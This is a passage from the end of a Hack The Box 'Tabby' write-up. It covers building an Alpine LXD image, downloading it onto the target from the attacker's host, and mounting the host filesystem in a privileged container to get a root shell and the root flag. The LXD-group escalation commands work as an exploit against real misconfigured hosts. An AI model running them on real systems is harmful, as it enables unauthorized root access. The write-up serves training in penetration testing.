/root/lxd-alpine-builder/rootfs/usr/s 100%[=========================================================================>] 2.66K --.-KB/s in 0s

2023-12-23 13:23:25 (394 MB/s) - ‘/root/lxd-alpine-builder/rootfs/usr/share/alpine-mirrors/MIRRORS.txt’ saved [2724/2724]

Selecting mirror http://repo.iut.ac.ir/repo/alpine/v3.19/main
fetch http://repo.iut.ac.ir/repo/alpine/v3.19/main/x86_64/APKINDEX.tar.gz
(1/25) Installing alpine-baselayout-data (3.4.3-r2)
(2/25) Installing musl (1.2.4_git20230717-r4)
(3/25) Installing busybox (1.36.1-r15)
Executing busybox-1.36.1-r15.post-install
(4/25) Installing busybox-binsh (1.36.1-r15)
(5/25) Installing alpine-baselayout (3.4.3-r2)
Executing alpine-baselayout-3.4.3-r2.pre-install
Executing alpine-baselayout-3.4.3-r2.post-install
(6/25) Installing ifupdown-ng (0.12.1-r4)
(7/25) Installing libcap2 (2.69-r1)
(8/25) Installing openrc (0.52.1-r1)
Executing openrc-0.52.1-r1.post-install
(9/25) Installing mdev-conf (4.6-r0)
(10/25) Installing busybox-mdev-openrc (1.36.1-r15)
(11/25) Installing alpine-conf (3.17.0-r0)
(12/25) Installing alpine-keys (2.4-r1)
(13/25) Installing alpine-release (3.19.0-r0)
(14/25) Installing ca-certificates-bundle (20230506-r0)
(15/25) Installing libcrypto3 (3.1.4-r2)
(16/25) Installing libssl3 (3.1.4-r2)
(17/25) Installing ssl_client (1.36.1-r15)
(18/25) Installing zlib (1.3-r2)
(19/25) Installing apk-tools (2.14.0-r5)
(20/25) Installing busybox-openrc (1.36.1-r15)
(21/25) Installing busybox-suid (1.36.1-r15)
(22/25) Installing scanelf (1.3.7-r2)
(23/25) Installing musl-utils (1.2.4_git20230717-r4)
(24/25) Installing libc-utils (0.7.2-r5)
(25/25) Installing alpine-base (3.19.0-r0)
Executing busybox-1.36.1-r15.trigger
OK: 10 MiB in 25 packages
root@InfoSec:~/lxd-alpine-builder# ls
alpine-v3.13-x86_64-20210218_0139.tar.gz alpine-v3.19-x86_64-20231223_1324.tar.gz build-alpine LICENSE README.md
root@InfoSec:~/lxd-alpine-builder#

30. Transfer the image to the target and deploy it

wget http://10.10.14.2:8000/alpine-v3.19-x86_64-20231223_1324.tar.gz

ash@tabby:~$ cd ~
cd ~
ash@tabby:~$ ls
ls
alpine-v3.19-x86_64-20231223_1324.tar.gz snap user.txt
ash@tabby:~$ lxd init
lxd init
Would you like to use LXD clustering? (yes/no) [default=no]:

Do you want to configure a new storage pool? (yes/no) [default=yes]:

Name of the new storage pool [default=default]:

Name of the storage backend to use (btrfs, dir, lvm, zfs, ceph) [default=zfs]: dir
dir
Would you like to connect to a MAAS server? (yes/no) [default=no]:

Would you like to create a new local network bridge? (yes/no) [default=yes]:

What should the new bridge be called? [default=lxdbr0]:

What IPv4 address should be used? (CIDR subnet notation, “auto” or “none”) [default=auto]:

What IPv6 address should be used? (CIDR subnet notation, “auto” or “none”) [default=auto]:

Would you like the LXD server to be available over the network? (yes/no) [default=no]:

Would you like stale cached images to be updated automatically? (yes/no) [default=yes]

Would you like a YAML "lxd init" preseed to be printed? (yes/no) [default=no]:

ash@tabby:~$ lxc image list
lxc image list
+---------+--------------+--------+-------------------------------+--------------+-----------+--------+------------------------------+
| ALIAS | FINGERPRINT | PUBLIC | DESCRIPTION | ARCHITECTURE | TYPE | SIZE | UPLOAD DATE |
+---------+--------------+--------+-------------------------------+--------------+-----------+--------+------------------------------+
| myimage | 6874271ece3b | no | alpine v3.19 (20231223_13:24) | x86_64 | CONTAINER | 3.48MB | Dec 23, 2023 at 6:03am (UTC) |
+---------+--------------+--------+-------------------------------+--------------+-----------+--------+------------------------------+
ash@tabby:~$ lxc init myimage ignite -c security.privileged=true
lxc init myimage ignite -c security.privileged=true
Creating ignite
ash@tabby:~$ lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true
<ydevice disk source=/ path=/mnt/root recursive=true
Device mydevice added to ignite
ash@tabby:~$ lxc start ignite
lxc start ignite

31. Finally, run the last step to obtain the root flag on the target

ash@tabby:~$ lxc exec ignite /bin/sh
lxc exec ignite /bin/sh
~ # id
id
uid=0(root) gid=0(root)
~ # cat /root/root.txt
cat /root/root.txt
cat: can't open '/root/root.txt': No such file or directory
~ # cat /root/root.txt
cat /root/root.txt
cat: can't open '/root/root.txt': No such file or directory
~ # cd /root
cd /root
~ # ls
ls
~ # pwd
pwd
/root
~ # ls
ls
~ # cd cd /mnt/root/
cd cd /mnt/root/
/bin/sh: cd: can't cd to cd: No such file or directory
~ # cd cd /mnt/root/
cd cd /mnt/root/
/bin/sh: cd: can't cd to cd: No such file or directory
~ # cd /mnt/root/
cd /mnt/root/
/mnt/root # ls
ls
bin etc lib64 mnt run sys
boot home libx32 opt sbin tmp
cdrom lib lost+found proc snap usr
dev lib32 media root srv var
/mnt/root # cd root
cd root
/mnt/root/root # ls
ls
root.txt snap
/mnt/root/root # cat root.txt
cat root.txt
32a3e0813bf2093db72555e47cfe036a
/mnt/root/root #

0x03 Completion Proof

https://www.hackthebox.com/achievement/machine/1705469/259


https://sh1yan.top/2023/12/19/Tabby-htb-writeup/
Author: shiyan
Published: 19 December 2023